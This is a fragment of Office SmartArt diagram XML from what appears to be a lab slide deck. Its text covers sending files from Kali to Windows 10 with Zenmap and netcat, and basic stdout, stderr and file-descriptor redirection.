        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8E4D4E13-7B87-40C4-839A-B60BD86EA001}" srcId="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" destId="{82D17439-F26F-4E24-A7CC-217EAA8E9CFB}" srcOrd="3" destOrd="0" parTransId="{411B400C-231E-453F-91CE-5A6C51D34DC3}" sibTransId="{C32BD346-8926-4CB0-B79C-6724304B462F}"/>
    <dgm:cxn modelId="{DD7E271C-FF34-4593-B226-13913C49D79E}" type="presOf" srcId="{6A85E831-83AC-4CBE-A04A-158534B0B496}" destId="{F4D5357D-4E8C-4757-8268-C80192744DD3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{9A7EC821-EE47-42E5-8731-C3AE4A48640F}" srcId="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" destId="{1CCC89E2-AFCB-4F1D-BE15-C30775E14DD5}" srcOrd="1" destOrd="0" parTransId="{37D8D7F6-82EC-4278-A3CE-35C0D79BBAA7}" sibTransId="{F0AE10F1-4F4D-491A-B374-C2F63919659A}"/>
    <dgm:cxn modelId="{23A21A2E-69CE-46CD-8AA2-2DE4FA99C049}" srcId="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" destId="{6A85E831-83AC-4CBE-A04A-158534B0B496}" srcOrd="2" destOrd="0" parTransId="{C8708527-29F1-45AD-84C4-85CC773FA03E}" sibTransId="{A8947B02-B569-42F0-BA8D-7C4208421369}"/>
    <dgm:cxn modelId="{53A3EE60-046E-4FE6-B60D-D539BA0ACD63}" type="presOf" srcId="{1CCC89E2-AFCB-4F1D-BE15-C30775E14DD5}" destId="{C952050B-D692-42B2-B6C6-D9FF89C7CC10}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{6E031842-E96A-4FBF-BDFB-EB75AF9D29AE}" type="presOf" srcId="{A8947B02-B569-42F0-BA8D-7C4208421369}" destId="{51BA17FE-5A34-42DF-BDD7-835351B0DB1D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{8578BD45-748A-40FB-A8CD-2C2E3FA856C7}" type="presOf" srcId="{82D17439-F26F-4E24-A7CC-217EAA8E9CFB}" destId="{09FD2FBB-6BDF-47D8-9E72-5B5D698C23DC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1603E349-5EF4-450F-9EF7-F6359EA66DC0}" type="presOf" srcId="{7F95AD54-CC49-43B7-ABDC-9E013F437FDB}" destId="{AAE43954-22E9-4644-92C8-9F7A82CCCAFB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{F8B62351-4458-44FE-8FD3-35F22C53C5FC}" srcId="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" destId="{47510470-AECF-4261-9C7F-974910BA2CE6}" srcOrd="0" destOrd="0" parTransId="{A119B126-E38B-44E9-B96B-788AABCDDB69}" sibTransId="{7F95AD54-CC49-43B7-ABDC-9E013F437FDB}"/>
    <dgm:cxn modelId="{127B6454-AA25-4CA0-8F17-47C2B967F9E7}" type="presOf" srcId="{47510470-AECF-4261-9C7F-974910BA2CE6}" destId="{4AED1A57-D364-4000-87E1-862042A86B45}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1775C784-B5A4-4958-95AF-D2511D2CD4B2}" type="presOf" srcId="{6A85E831-83AC-4CBE-A04A-158534B0B496}" destId="{5FC85B4D-AD90-452B-8C23-875E5C090D62}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{8DB1D8B9-3745-4F1D-BA6E-33FD0309135F}" type="presOf" srcId="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" destId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{78FA3FEC-0C76-4E9F-94D7-69B245D272FC}" type="presOf" srcId="{82D17439-F26F-4E24-A7CC-217EAA8E9CFB}" destId="{FC88EE28-D09C-4C12-BBD0-C28E0CC33576}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{89E413EE-5EC5-42E8-B5BB-55F1700383DE}" type="presOf" srcId="{47510470-AECF-4261-9C7F-974910BA2CE6}" destId="{2E23091E-3B67-44AE-A881-F80BBE5A3651}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1BCE97F2-9021-4BF0-8713-DDD5EC600F3E}" type="presOf" srcId="{F0AE10F1-4F4D-491A-B374-C2F63919659A}" destId="{8658780E-DE24-42FB-9CF8-5E7F9B2B1738}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{363FA6F9-2C89-471D-8192-441CBEEA7AE2}" type="presOf" srcId="{1CCC89E2-AFCB-4F1D-BE15-C30775E14DD5}" destId="{69513F20-B31F-4051-9885-18110AD85674}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{5B1FAC3F-7709-42E0-91A8-259E5D33DB30}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{C77B16AE-79F3-4A91-A144-E4962EB8C3EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{FCE132D7-863E-4E8B-AA37-B8B7C4D669F6}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{4AED1A57-D364-4000-87E1-862042A86B45}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{E81D5F41-4C91-4098-A467-83E6A3081B94}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{C952050B-D692-42B2-B6C6-D9FF89C7CC10}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{5E237BCC-CAE9-4E7B-BACE-A6E13D526386}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{F4D5357D-4E8C-4757-8268-C80192744DD3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{52ECEB94-F460-47DE-874A-6DE1186931E0}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{09FD2FBB-6BDF-47D8-9E72-5B5D698C23DC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{9C34433D-CA90-4F14-8F50-C2F6A826C539}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{AAE43954-22E9-4644-92C8-9F7A82CCCAFB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{27D19FCB-C8E7-4D3F-A214-97762FEA10F9}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{8658780E-DE24-42FB-9CF8-5E7F9B2B1738}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{A002E0A0-488A-4FDA-8D14-95B9E40E5ACC}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{51BA17FE-5A34-42DF-BDD7-835351B0DB1D}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{9857168E-8529-43FB-82E2-A39E00C7A2B0}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{2E23091E-3B67-44AE-A881-F80BBE5A3651}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{488336FD-6CC3-47F9-9DA5-DE729E3B38F0}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{69513F20-B31F-4051-9885-18110AD85674}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{86071FAC-0ABD-47CD-8724-6A101D93A908}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{5FC85B4D-AD90-452B-8C23-875E5C090D62}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{8686EC58-807E-4CFA-B58F-65AB80D1BE26}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{FC88EE28-D09C-4C12-BBD0-C28E0CC3357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46792E-CA65-440B-847E-AD469444293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3D80E64-DD00-42DD-B795-D6AA44BF96A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Send files from Kali to Windows 10</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDF64EAE-60EE-4640-9E55-C825FF7D01C9}" type="parTrans" cxnId="{79C802F5-6E66-46E5-A4F5-0D67210AEDB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2AB15634-F90E-451B-8B71-ADBA01BAD767}" type="sibTrans" cxnId="{79C802F5-6E66-46E5-A4F5-0D67210AEDB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Solution</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{282DA01B-A8A7-4536-B0DB-7F8E171586C3}" type="parTrans" cxnId="{18868971-9E3F-4A18-8B5D-615F14208C50}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9E628CE-E5D0-402F-95CC-120699CC8527}" type="sibTrans" cxnId="{18868971-9E3F-4A18-8B5D-615F14208C50}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20EB9557-8B9A-41A5-8A43-9E2BAE55A361}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Use Zenmap</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AEDA0FA1-9AAC-44CD-8FEC-4E656B01E5B9}" type="parTrans" cxnId="{DFFF16F2-E74A-43A9-8552-9FB313F35B4A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A32EED2E-CAAF-407C-A6A7-F8C9137A93E2}" type="sibTrans" cxnId="{DFFF16F2-E74A-43A9-8552-9FB313F35B4A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DB46F20-B44C-4E56-92C5-33045243A5B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>netcat is integrated into Zenmap</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0ED15E3C-C65B-4F0F-B188-00B45278DDE9}" type="parTrans" cxnId="{FB0F2E76-B8CF-4051-AD97-5BDE0E899127}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B581073C-F274-47E7-A2CF-9042F936B3AD}" type="sibTrans" cxnId="{FB0F2E76-B8CF-4051-AD97-5BDE0E899127}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62C27EA3-5C47-4B76-990C-1E4AA5FA057A}" type="pres">
      <dgm:prSet presAssocID="{A846792E-CA65-440B-847E-AD4694442936}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23D6FAD6-574B-4A2D-8C71-F43978323DD0}" type="pres">
      <dgm:prSet presAssocID="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" presName="boxAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4858B37C-7502-4138-AF92-C6659A5B3939}" type="pres">
      <dgm:prSet presAssocID="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" presName="parentTextBox" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99AFE39A-9BA9-4D2F-85A1-DB783B7FF4B8}" type="pres">
      <dgm:prSet presAssocID="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" presName="entireBox" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{47AC8640-7DC9-4919-8E4A-898050032FA4}" type="pres">
      <dgm:prSet presAssocID="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" presName="descendantBox" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{976D2CC0-DBFD-44F6-8CD0-2010504F5D42}" type="pres">
      <dgm:prSet presAssocID="{20EB9557-8B9A-41A5-8A43-9E2BAE55A361}" presName="childTextBox" presStyleLbl="fgAccFollowNode1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14456EC4-9209-4B9A-9130-1D2B6232CD43}" type="pres">
      <dgm:prSet presAssocID="{1DB46F20-B44C-4E56-92C5-33045243A5B3}" presName="childTextBox" presStyleLbl="fgAccFollowNode1" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6AD87078-5E1F-4890-AF77-2E2BB5919009}" type="pres">
      <dgm:prSet presAssocID="{2AB15634-F90E-451B-8B71-ADBA01BAD767}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2224FA37-C588-4BCE-8C61-891A39679EAB}" type="pres">
      <dgm:prSet presAssocID="{63D80E64-DD00-42DD-B795-D6AA44BF96A4}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{840DB5AA-C142-4CA9-A04D-786A8A72D61B}" type="pres">
      <dgm:prSet presAssocID="{63D80E64-DD00-42DD-B795-D6AA44BF96A4}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7F45812D-58B5-4091-8C17-552A3F86B449}" type="presOf" srcId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" destId="{99AFE39A-9BA9-4D2F-85A1-DB783B7FF4B8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{18868971-9E3F-4A18-8B5D-615F14208C50}" srcId="{A846792E-CA65-440B-847E-AD4694442936}" destId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" srcOrd="1" destOrd="0" parTransId="{282DA01B-A8A7-4536-B0DB-7F8E171586C3}" sibTransId="{F9E628CE-E5D0-402F-95CC-120699CC8527}"/>
    <dgm:cxn modelId="{FB0F2E76-B8CF-4051-AD97-5BDE0E899127}" srcId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" destId="{1DB46F20-B44C-4E56-92C5-33045243A5B3}" srcOrd="1" destOrd="0" parTransId="{0ED15E3C-C65B-4F0F-B188-00B45278DDE9}" sibTransId="{B581073C-F274-47E7-A2CF-9042F936B3AD}"/>
    <dgm:cxn modelId="{C0FF9D91-D80C-4DB9-9B49-9A0CD303BCBE}" type="presOf" srcId="{63D80E64-DD00-42DD-B795-D6AA44BF96A4}" destId="{840DB5AA-C142-4CA9-A04D-786A8A72D61B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{1631329E-4932-43D2-90B6-2898A9623279}" type="presOf" srcId="{20EB9557-8B9A-41A5-8A43-9E2BAE55A361}" destId="{976D2CC0-DBFD-44F6-8CD0-2010504F5D42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{BD3E2DBA-A0E9-434C-9A95-28BBD36F6DC7}" type="presOf" srcId="{1DB46F20-B44C-4E56-92C5-33045243A5B3}" destId="{14456EC4-9209-4B9A-9130-1D2B6232CD43}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{A7B8B5D5-C07C-42C3-AA44-EF03E6A9A265}" type="presOf" srcId="{A846792E-CA65-440B-847E-AD4694442936}" destId="{62C27EA3-5C47-4B76-990C-1E4AA5FA057A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{C49B57E5-ABE2-4EE7-8565-190D38C05239}" type="presOf" srcId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" destId="{4858B37C-7502-4138-AF92-C6659A5B3939}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{DFFF16F2-E74A-43A9-8552-9FB313F35B4A}" srcId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" destId="{20EB9557-8B9A-41A5-8A43-9E2BAE55A361}" srcOrd="0" destOrd="0" parTransId="{AEDA0FA1-9AAC-44CD-8FEC-4E656B01E5B9}" sibTransId="{A32EED2E-CAAF-407C-A6A7-F8C9137A93E2}"/>
    <dgm:cxn modelId="{79C802F5-6E66-46E5-A4F5-0D67210AEDB9}" srcId="{A846792E-CA65-440B-847E-AD4694442936}" destId="{63D80E64-DD00-42DD-B795-D6AA44BF96A4}" srcOrd="0" destOrd="0" parTransId="{EDF64EAE-60EE-4640-9E55-C825FF7D01C9}" sibTransId="{2AB15634-F90E-451B-8B71-ADBA01BAD767}"/>
    <dgm:cxn modelId="{A99CF836-7E4F-483F-AC7C-B989142785EA}" type="presParOf" srcId="{62C27EA3-5C47-4B76-990C-1E4AA5FA057A}" destId="{23D6FAD6-574B-4A2D-8C71-F43978323DD0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{E5E58408-9E07-489F-8C1F-D80DB66332DB}" type="presParOf" srcId="{23D6FAD6-574B-4A2D-8C71-F43978323DD0}" destId="{4858B37C-7502-4138-AF92-C6659A5B3939}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{2AB7DDED-18FC-458E-A7CB-42A377730B35}" type="presParOf" srcId="{23D6FAD6-574B-4A2D-8C71-F43978323DD0}" destId="{99AFE39A-9BA9-4D2F-85A1-DB783B7FF4B8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{3244CA2B-35AA-47C5-B904-29DC70BD4E78}" type="presParOf" srcId="{23D6FAD6-574B-4A2D-8C71-F43978323DD0}" destId="{47AC8640-7DC9-4919-8E4A-898050032FA4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{C9A20CEA-B83C-42D5-A4D6-400AC3495328}" type="presParOf" srcId="{47AC8640-7DC9-4919-8E4A-898050032FA4}" destId="{976D2CC0-DBFD-44F6-8CD0-2010504F5D42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{FB4A0E52-BBCD-40A5-92AC-50A26C149616}" type="presParOf" srcId="{47AC8640-7DC9-4919-8E4A-898050032FA4}" destId="{14456EC4-9209-4B9A-9130-1D2B6232CD43}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{E8C05F94-83BA-4D2D-A363-A957B594D120}" type="presParOf" srcId="{62C27EA3-5C47-4B76-990C-1E4AA5FA057A}" destId="{6AD87078-5E1F-4890-AF77-2E2BB5919009}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{066BDE69-0A78-4D9B-9457-80AB8288B1CE}" type="presParOf" srcId="{62C27EA3-5C47-4B76-990C-1E4AA5FA057A}" destId="{2224FA37-C588-4BCE-8C61-891A39679EAB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{7C95E091-D123-48DA-A29E-5902B915D01A}" type="presParOf" srcId="{2224FA37-C588-4BCE-8C61-891A39679EAB}" destId="{840DB5AA-C142-4CA9-A04D-786A8A72D61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2D1FCA-0D40-4885-9502-EE3710779E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B2423C-27B3-411F-817F-7C361E1F91FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>There are two places programs send output to: Standard output (stdout) and Standard Error (stderr);</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97E8125D-D4FF-4570-8E54-688A28EBE19C}" type="parTrans" cxnId="{1AFD7B3D-68FD-4693-93CF-E56ED4AE1DFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED1B876D-F2E4-494B-97FC-B057850BCD24}" type="sibTrans" cxnId="{1AFD7B3D-68FD-4693-93CF-E56ED4AE1DFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>You can redirect these outputs to a different place (like a file);</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8F092DD-049F-4206-A292-9164F1D6833E}" type="parTrans" cxnId="{C8216E25-D689-4717-A67D-1C19CD3D8C4E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB7E91A0-188C-49F0-8836-E62F023A973E}" type="sibTrans" cxnId="{C8216E25-D689-4717-A67D-1C19CD3D8C4E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>File descriptors are used to identify stdout (1) and stderr (2);</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A06259A-6181-4517-A6D2-216494B6B41F}" type="parTrans" cxnId="{593F49A9-BD1B-48C1-AA90-6DBE9D98FED9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06217971-3666-4A37-97D9-3D65509A4B0B}" type="sibTrans" cxnId="{593F49A9-BD1B-48C1-AA90-6DBE9D98FED9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AA89CED-36AA-4518-92E0-87757BDCF75E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>command &gt; output is just a shortcut for command 1&gt; output;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E319DC0D-8CB0-4532-8E06-456ED71C3F19}" type="parTrans" cxnId="{23BCC2A0-B3A4-416E-B08F-30CF66EA2292}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E22FAB0-F2E6-4D54-9CA0-E8BA83CE3B60}" type="sibTrans" cxnId="{23BCC2A0-B3A4-416E-B08F-30CF66EA2292}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92C0E0D3-E323-4F00-9CEC-827E255B5508}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>You can use &amp;[FILE_DESCRIPTOR] to reference a file descriptor value;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06E96879-A389-4633-AC1A-E9D67AFD0AB7}" type="parTrans" cxnId="{F1B4AD5C-A8A7-4BBF-81D9-C8E051252BF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26F172A4-F503-4DE0-9102-4FA52164763F}" type="sibTrans" cxnId="{F1B4AD5C-A8A7-4BBF-81D9-C8E051252BF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
